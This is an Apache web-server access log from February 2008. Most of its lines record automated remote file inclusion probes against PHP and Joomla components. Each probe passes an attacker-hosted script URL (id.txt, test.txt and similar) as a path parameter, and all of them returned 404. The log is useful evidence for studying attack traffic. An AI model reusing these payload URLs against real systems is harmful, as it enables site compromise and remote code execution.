193.239.6.64 - - [19/Feb/2008:04:07:16 -0800] "GET //modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.6.64 - - [19/Feb/2008:04:07:17 -0800] "GET /logs//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.239.6.64 - - [19/Feb/2008:04:08:04 -0800] "GET /logs/access_071212.log//modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.cartographia.org/administrator/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:08:17 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:08:17 -0800] "GET /logs/access_080120.log//lazarusgb/admin.php?include_path=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:08:17 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:08:17 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:08:35 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:08:35 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:08:35 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:08:38 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.234.108.168 - - [19/Feb/2008:04:08:42 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
82.165.243.164 - - [19/Feb/2008:04:08:45 -0800] "GET /logs/access_071225.log//errors.php?errors=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:08:46 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:09:43 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:09:47 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [19/Feb/2008:04:09:55 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [19/Feb/2008:04:09:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [19/Feb/2008:04:09:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:10:13 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.85.107.22 - - [19/Feb/2008:04:10:18 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.193.222.218 - - [19/Feb/2008:04:10:21 -0800] "GET /modules/vwar/admin/admin.php?vwar_root=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
213.193.222.218 - - [19/Feb/2008:04:10:22 -0800] "GET /logs/modules/vwar/admin/admin.php?vwar_root=http://www.beautybylaura.co.uk/zencart/includes/mambo?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
212.16.254.7 - - [19/Feb/2008:04:10:42 -0800] "GET /logs/access.log//modules/xfsection/modify.php?dir_module=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.165.243.164 - - [19/Feb/2008:04:10:57 -0800] "GET /logs/access_071225.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.22.60.11 - - [19/Feb/2008:04:11:02 -0800] "GET /logs/access.log//errors.php?error=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.22.60.11 - - [19/Feb/2008:04:11:03 -0800] "GET /logs//errors.php?error=http://www.demens.be/images/upload/plekih/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:04:11:11 -0800] "GET /logs/access_080201.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:04:11:11 -0800] "GET //administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:04:11:12 -0800] "GET /logs//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:04:11:55 -0800] "GET /logs/access_080122.log//newspublish/include.php?path%5Bdocroot%5D=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:04:11:55 -0800] "GET //newspublish/include.php?path%5Bdocroot%5D=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.186.169.183 - - [19/Feb/2008:04:11:55 -0800] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://jaspo41.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.53.3.206 - - [19/Feb/2008:04:12:31 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
74.53.3.206 - - [19/Feb/2008:04:12:31 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
200.234.200.134 - - [19/Feb/2008:04:12:57 -0800] "GET /logs/access_080106.log//administrator/components/com_mosmedia/includes/media.divs.php?mosConfig_absolute_path=http://www.pucorp.t5.com.br/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.47.200.153 - - [19/Feb/2008:04:13:33 -0800] "GET /logs//lazarusgb/admin.php?include_path=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
72.47.200.153 - - [19/Feb/2008:04:13:33 -0800] "GET //lazarusgb/admin.php?include_path=http://www.trinker-ulm.de//phpmic.txt.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:14:06 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:14:06 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:14:07 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.109.240.206 - - [19/Feb/2008:04:14:09 -0800] "GET /index1.php?x=http://www.mulenews.com/datebook/image/f.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.33.204.4 - - [19/Feb/2008:04:14:27 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
66.33.204.4 - - [19/Feb/2008:04:14:27 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://sdenova.com/stats/include/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:14:42 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:14:42 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:14:42 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:15:20 -0800] "GET //modules/xfsection/modify.php?dir_module=http://www.sociallyhot.com/admin/zey.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:04:15:22 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:04:16:48 -0800] "GET /logs/access_080211.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:04:16:48 -0800] "GET //administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:04:16:49 -0800] "GET /logs//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:04:17:14 -0800] "GET /logs//classes/Customer.class.php?rootdir=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
66.212.28.43 - - [19/Feb/2008:04:17:14 -0800] "GET //classes/Customer.class.php?rootdir=http://www.cerfirenze.it/images/icone/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:17:49 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:04:17:55 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
217.172.183.206 - - [19/Feb/2008:04:17:59 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.lexiaintl.org/templates/css/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
202.60.94.234 - - [19/Feb/2008:04:18:08 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.pemmican.mb.ca/stats/.tmp/.ateam/id??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:04:18:38 -0800] "GET /logs/access_071225.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.193.204.60 - - [19/Feb/2008:04:20:07 -0800] "GET //components/com_smf/smf.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
62.193.204.60 - - [19/Feb/2008:04:20:12 -0800] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://www.happyweighthappylife.nl/.x/test.txt??? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.dmulk.com"
212.16.254.7 - - [19/Feb/2008:04:20:38 -0800] "GET /logs/access.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.16.254.7 - - [19/Feb/2008:04:20:39 -0800] "GET //errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.16.254.7 - - [19/Feb/2008:04:20:39 -0800] "GET /logs//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:04:21:20 -0800] "GET /logs/access_080201.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:04:21:20 -0800] "GET /index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:04:21:21 -0800] "GET /logs/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.17.200.74 - - [19/Feb/2008:04:21:40 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://nadzorkomi.ru/administrator/lib5.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.205.6.94 - - [19/Feb/2008:04:21:58 -0800] "GET /logs/access_080201.log//administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://h1.ripway.com/snacks/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.28.17 - - [19/Feb/2008:04:23:18 -0800] "GET /logs/access_071021.log HTTP/1.0" 200 17408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
216.229.95.19 - - [19/Feb/2008:04:23:34 -0800] "GET /logs/access.log/index.php?option=com_chronocontact&Itemid=&mosConfig_absolute_path=http://www.trosken.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:04:23:39 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
82.146.33.210 - - [19/Feb/2008:04:23:39 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.smagz.com/jim.do?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
82.165.243.164 - - [19/Feb/2008:04:24:29 -0800] "GET /logs/access.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.164 - - [19/Feb/2008:04:24:30 -0800] "GET //errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.165.243.164 - - [19/Feb/2008:04:24:30 -0800] "GET /logs//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.170.21.81 - - [19/Feb/2008:04:25:58 -0800] "GET /logs/access.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.170.21.81 - - [19/Feb/2008:04:25:59 -0800] "GET //errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.170.21.81 - - [19/Feb/2008:04:25:59 -0800] "GET /logs//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.16.254.7 - - [19/Feb/2008:04:26:37 -0800] "GET /logs/access_071225.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:04:26:52 -0800] "GET /logs/access_080131.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:04:26:52 -0800] "GET //administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:04:26:53 -0800] "GET /logs//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [19/Feb/2008:04:26:53 -0800] "GET /logs/access.log//admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.moscowinternationalcircus.com/users/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.198.63.21 - - [19/Feb/2008:04:26:54 -0800] "GET /logs/access.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.198.63.21 - - [19/Feb/2008:04:26:54 -0800] "GET //errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.198.63.21 - - [19/Feb/2008:04:26:55 -0800] "GET /logs//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:04:26:56 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Avant Browser (http://www.avantbrowser.com)" "www.dmulk.com"
128.196.27.145 - - [19/Feb/2008:04:26:56 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:06 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4387M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
212.16.254.7 - - [19/Feb/2008:04:27:14 -0800] "GET /logs/access_071230.log//errors.php?error=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:15 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4369M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:28 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4367M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:29 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4364M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:33 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4366M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:36 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4365M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:40 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4362M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:27:51 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4360M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:28:04 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4379M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:28:13 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4378M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:28:15 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4377M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
198.253.49.6 - - [19/Feb/2008:04:28:20 -0800] "GET /bikes/dteel/2008_01_27/Medium/IMG_4376M.JPG HTTP/1.1" 304 - "-" "Mozilla/4.0 (compatible;)" "www.dmulk.com"
67.195.44.103 - - [19/Feb/2008:04:29:44 -0800] "GET /logs/access_080201.log HTTP/1.0" 200 786432 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
140.128.57.1 - - [19/Feb/2008:04:30:51 -0800] "GET /administrator/components/com_jcs/jcs.function.php?mosConfig_absolute_path=[evil_root]? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.206.72.201 - - [19/Feb/2008:04:31:36 -0800] "GET /logs/access_080201.log//administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://horseshoebendarkansas.net/blog/nucleus/libs/include/setup_pages2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:04:31:45 -0800] "GET /components/com_cpg/cpg.php?mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
202.60.64.18 - - [19/Feb/2008:04:31:45 -0800] "GET /logs/components/com_cpg/cpg.php?mosConfig_absolute_path=http://communityflow.com/forum/weblogs/templates/911/lang_english/_vti_bin/boo.do??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
201.134.127.27 - - [19/Feb/2008:04:32:26 -0800] "GET //lazarusgb/admin.php?include_path=http://www.communalmarket.com/stores/esmart/images/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:04:33:30 -0800] "GET /logs/access.log/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.100.19.241 - - [19/Feb/2008:04:33:31 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
